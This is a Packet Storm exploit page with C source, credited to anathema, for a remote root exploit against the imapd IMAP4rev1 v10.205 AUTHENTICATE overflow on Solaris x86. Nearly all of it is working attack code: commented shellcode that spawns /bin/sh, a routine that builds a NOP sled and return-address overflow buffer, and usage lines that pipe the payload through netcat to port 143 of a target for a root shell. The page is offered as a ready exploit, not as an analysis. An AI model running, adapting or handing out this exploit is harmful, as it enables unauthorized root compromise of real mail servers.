imapd IMAP4rev1 v10.205 remote root exploit, solaris x86. Exploits the AUTHENTICATE overflow, yielding a remote root shell.
17dccafa4023b4e90eca4080fb7fb349/*
imapd IMAP4rev1 v10.205 remote root exploit, solaris x86 (not SPARC yet)
exploits the AUTHENTICATE overflow, yielding a remote root shell
shellcode is obviously modified to avoid problems with toupper()
by anathema <anathema@hack.co.za>
*/
/*
Compilation:
$ gcc imapd.c -o imapd
Requires netcat for usage:
$ (./imapd [offset]; cat) | nc host 143
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#define RET 1028
#define ADDR 0x08047148
char c0de[] =
/* main: */
"\xeb\x33" /* jmp callz */
/* start: */
"\x5e" /* popl %esi */
"\x8d\x06" /* leal (%esi), %eax */
"\x29\xc9" /* subl %ecx, %ecx */
"\x89\xf3" /* movl %esi, %ebx */
"\x89\x5e\x08" /* movl %ebx, 0x08(%esi) */
"\xb1\x07" /* movb $0x07, %cl */
/* loopz: */
/*
Go through a loop, incrementing the `/bin/sh -= 0x20` string
by 0x20, yielding /bin/sh for execve(). Why do other exploits
increment each char individually? Using the loop instruction is
far more efficient.. -a
*/
"\x80\x03\x20" /* addb $0x20, (%ebx) */
"\x43" /* incl %ebx */
"\xe0\xfa" /* loopne loopz */
"\x93" /* xchgl %eax, %ebx */
"\x29\xc0" /* subl %eax, %eax */
"\x89\x5e\x0b" /* movl %ebx, 0x0b(%esi) */
"\x29\xd2" /* subl %edx, %edx */
"\x88\x56\x19" /* movb %dl, 0x19(%esi) */
"\x89\x56\x07" /* movl %edx, 0x07(%esi) */
"\x89\x56\x0f" /* movl %edx, 0x0f(%esi) */
"\x89\x56\x14" /* movl %edx, 0x14(%esi) */
"\xb0\x3b" /* movb $0x3b, %al */
"\x8d\x4e\x0b" /* leal 0x0b(%esi), %ecx */
"\x89\xca" /* movl %ecx, %edx */
"\x52" /* pushl %edx */
"\x51" /* pushl %ecx */
"\x53" /* pushl %ebx */
"\x50" /* pushl %eax */
"\xeb\x18" /* jmp lcall */
/* callz: */
"\xe8\xc8\xff\xff\xff" /* call start */
"\x0f\x42\x49\x4e\x0f\x53\x48" /* /bin/sh -= 0x20 */
"\x01\x01\x01\x01\x02\x02\x02\x02\x03\x03\x03\x03"
/* lcall: */
"\x9a\x04\x04\x04\x04\x07\x04";
int
main (int argc, char **argv)
{
u_char buf[4096] = {0};
u_long addr = ADDR;
int ret = RET, i = 0, j = 0;
if (argc > 1) addr += atoi(argv[1]);
fprintf(stderr, "addr 0x%lx\n", addr);
memset(buf, 0x90, ret);
memcpy(buf + ret - strlen(c0de), c0de, strlen(c0de));
for (i = ret; i < ret + 28; i++)
{
buf[i+0] = (addr & 0xff);
buf[i+1] = (addr >> 8) & 0xff;
buf[i+2] = (addr >> 16) & 0xff;
buf[i+3] = (addr >> 24) & 0xff;
}
printf("* AUTHENTICATE {%d}\r\n", strlen(buf));
printf("%s\n", buf);
sleep(1);
printf("\nuname -a; id;\n");
}
/* EOF */
/* www.hack.co.za */
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!